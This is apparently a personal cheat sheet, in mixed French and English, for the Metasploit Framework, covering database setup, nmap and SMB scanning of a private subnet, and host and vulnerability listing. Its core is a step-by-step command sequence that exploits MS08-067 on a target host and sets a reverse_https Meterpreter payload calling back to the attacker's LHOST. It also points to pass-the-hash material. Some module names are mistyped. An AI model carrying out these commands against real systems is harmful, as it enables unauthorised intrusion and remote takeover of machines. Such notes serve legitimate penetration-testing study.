Metasploit Framework (msf)
sudo msfconsole
MSF> db_connect <username>:<password>@127.0.0.1/<DATABASE>
check db, workspace creation
-
db_status
-
worspace
(répond default) -
workspace -a customer1-dmz1
db_nmap -A -sT 192.168.50.0/24
db_nmap -sT --script smb-check-vulns.nse -p U:137,T:139 192.168.50.20
Read this article from spareclockcycles.org
auxiliary
see /opt/backbox/msf/modules/auxiliary/scanner/smb
msf> use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version)> show options
msf auxiliary(smb_version)> set RHOSTS 192.168.50.20
msf auxiliary(smb_version)> exploit
msf auxiliary(smb_version)> back
msf>
cf Metasploit Unleashed website on Auxiliary Modules.
msf> db_import /home/user/report.nbe
msf> hosts -c address,name,os_flavor,svcs,vulns
-c indique col
msf> vulns -i
msf> search ms09_001
on ch dans msf un exploit
- module: component of Metasploit Framework (e.g. scanner,payload)
- vulnerability: security flaw in software that allows for unintended use
- exploit: code that makes use of a vulnerability to execute arbitrary commands
- stager: ‘magic tricks’ that allow your payload to execute successfully
- payload: arbitrary commands in shellcode (e.g. DoS or a remote shell)
Ex ms08-067 (de rank great):
msf> use exploit/windows/smb/ms08-_067_netapi
msf exploit(ms08-_067_netapi)> show options
msf exploit(ms08-_067_netapi)> set RHOST 192.168.50.20
msf exploit(ms08-_067_netapi)> setg LHOST 192.168.50.10
show payloads
or with TAB set playload windows/meterpreter/
reverse_https
msf exploit(ms08-_067_netapi)> show advanced
msf exploit(ms08-_067_netapi)> exploit
Read more about the pass-the-hash technique.
Links on Meterpreter
From (2013): http://sinflood.net/?p=283
Other web sites on msf
metasploit-unleashed online course